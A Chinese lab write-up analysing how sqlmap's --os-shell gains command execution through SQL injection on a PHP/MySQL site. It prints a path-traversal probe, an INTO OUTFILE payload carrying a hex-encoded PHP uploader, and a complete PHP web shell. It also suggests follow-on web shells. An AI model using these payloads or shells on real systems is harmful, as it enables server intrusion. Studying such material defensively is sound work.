sqlmap之os?shell怎么使用

這篇文章主要介紹“sqlmap之os shell怎么使用”，在日常操作中，相信很多人在sqlmap之os shell怎么使用問題上存在疑惑，小編查閱了各式資料，整理出簡單好用的操作方法，希望對大家解答”sqlmap之os shell怎么使用”的疑惑有所幫助！接下來，請跟著小編一起來學習吧！

0x00 Background

最近遇到測試環境，最后利用sqlmap的--os-shell參數取得shell。一直以來，對這個參數的工作原理不是十分的清晰。大致的思想應該是將腳本插入到數據庫中，然后生成相應的代碼文件，獲取shell即可執行命令。

0x01 Environment[

 本環境是在局域網下利用兩臺主機搭建的，環境比較真實。

攻擊機：

• 系統：windows7

• 工具：sqlmap

靶機：

• 系統：windows7

• 環境：wamp搭建的apache、mysql和php

• 網頁源碼：phpmywind，此處修改了點源代碼，方便進行測試。

0x02 Attack demo

（1）環境測試

url:192.168.0.166/php/newsshow.php?cid=4&id=11

截圖：

（2）攻擊

python sqlmap.py -u http://192.168.0.166/php/newsshow.php?cid=4 --os-shell

（3）選擇語言

sqlmap默認為php，此處根據需求選擇。

（4）輸入絕對路徑

此處因為用wamp搭建，并安裝在c盤下。所以選擇2選項，輸入路徑為c:/wamp/www

（5）建立os-shell并執行命令

0x03 Analysis

（1）抓包

利用wireshark進行抓包

（2）第一個url分析

http://192.168.0.166/php/newsshow.php?cid=4&BWGH%3D3922 AND 1%3D1 UNION ALL SELECT 1%2C2%2C3%2Ctable_name FROM information_schema.tables WHERE 2>1-- ..%2F..%2F..%2Fetc%2Fpasswd

url解碼

http://192.168.0.166/php/newsshow.php?cid=4&BWGH=3922 AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd

這條語句我認為對于os-shell并沒有實際性的作用。

（3）插入數據

3.1解析into outfile

http://192.168.0.166/php/newsshow.php?cid=-6901 OR 3616%3D3616 LIMIT 0%2C1 INTO OUTFILE '%2Fwamp%2Fwww%2Ftmpulujm.php' LINES TERMINATED BY 0x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d5c5c77616d705c5c7777775c5c3e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a-- -- -

解析url（除16進制字符）

http://192.168.0.166/php/newsshow.php?cid=-6901 OR 3616=3616 LIMIT 0,1 INTO OUTFILE '/wamp/www/tmpulujm.php' LINES TERMINATED BY 0x...

解釋：select * from * limit 0,1 into outfile '/wamp/www/tmpulujm.php'的意思是將內容輸入到outfile中。

LINES TERMINATED BY則是into outfile的參數，意思是行結尾的時候用by后面的內容，通常的一般為‘/r/n’，此處我們將by后的內容修改為后面的16進制的文件。

解析16進制文件

如上圖，16進制轉換為字符串為：

`

轉換后的代碼

顯然，16進制為php代碼。

先訪問以下tmpulujm.php

此處主要實現了向服務器傳輸文件的一個功能。此處簡單看下上述文件php語句進行分析。

實現的就是上傳文件，同時根據phpversion,將上傳的文件的權限進行修改。學習到一點就是4.1.0的版本下，可直接執行。

（4）執行命令

現在我們已經可以上傳文件了，但是仔細考慮一下，sqlmap是提供一個os-shell，我們現在只分析到了可以上傳文件的步驟。那接下來，還需要在抓取的數據中進行分析。

在分析數據包中，我看到一個post數據包，從content中看到此數據包是實現了上傳一個類似于cmd的一個php文件。

從上圖可以看到，利用tmpulujm.php上傳了一個tmpbtfgo.php的文件。將tmpbtfgo.php的內容截取出來，得到了一段php代碼。格式請自行調整。

<?php 
$c=$_REQUEST["cmd"];
@set_time_limit(0);
@ignore_user_abort(1);
@ini_set('max_execution_time',0);
$z=@ini_get('disable_functions');
if(!empty($z))
{
	$z=preg_replace('/[, ]+/',',',$z);
	$z=explode(',',$z);
	$z=array_map('trim',$z);}
else
	{
		$z=array();
		}
$c=$c." 2>&1\n";
function f($n)
{global $z;
return is_callable($n)and!in_array($n,$z);
}
if(f('system'))
{ob_start();
system($c);
$w=ob_get_contents();
ob_end_clean();
}elseif(f('proc_open')){
	$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);
    $w=NULL;
    while(!feof($t[1])){
		$w.=fread($t[1],512);
	    	}
        @proc_close($y);
}
    elseif(f('shell_exec')){
	$w=shell_exec($c);
	}
	elseif(f('passthru')){
		ob_start();
		passthru($c);
		$w=ob_get_contents();
		ob_end_clean();
		}elseif(f('popen')){
			$x=popen($c,r);
			$w=NULL;
			if(is_resource($x)){
				while(!feof($x)){
				$w.=fread($x,512);
					}
					}
					@pclose($x);
					}elseif(f('exec')){
						$w=array();
						exec($c,$w);
						$w=join(chr(10),$w).chr(10);
						}else{
							$w=0;
							}
							print "</pre>".$w."</pre>";?>'''

上述代碼實現了os-shell得到了命令后，如何執行命令以及輸出執行結果到os-shell中。
因此我們可以在os-shell中執行命令。

0x04 os-shell的使用

通過上述的分析，我們知道了sqlmap os-shell參數的用法以及原理。

很多的人會對os-shell的使用進行吐槽，這是得要多大的權限才能執行。是的，os-shell的執行條件有三個

（1）網站必須是root權限

（2）攻擊者需要知道網站的絕對路徑

（3）GPC為off，php主動轉義的功能關閉

此處對于中小型企業，如果自己搭建的服務器，例如直接用wamp或者phpnow等快捷方式搭建的服務器，基本上可以滿足以上三個條件。
同時，對于os-shell的用法，很多的小伙伴會吐槽，都他么能上傳了，還搞jb的os-shell了。對的，我們可以直接上傳大馬進行下一步的工作。當然亦可以上傳一句話，然后利用菜刀進行連接。

此處只是對sqlmap工作原理進行了一頓分析。至于利用方式以及攻擊手段，當然有很多種，自行發散思維即可。接下來的工作是直接看下sqlmap的源碼，才能理解的更為深刻。

到此，關于“sqlmap之os shell怎么使用”的學習就結束了，希望能夠解決大家的疑惑。理論與實踐的搭配能更好的幫助大家學習，快去試試吧！若想繼續學習更多相關知識，請繼續關注億速云網站，小編會繼續努力為大家帶來更多實用的文章！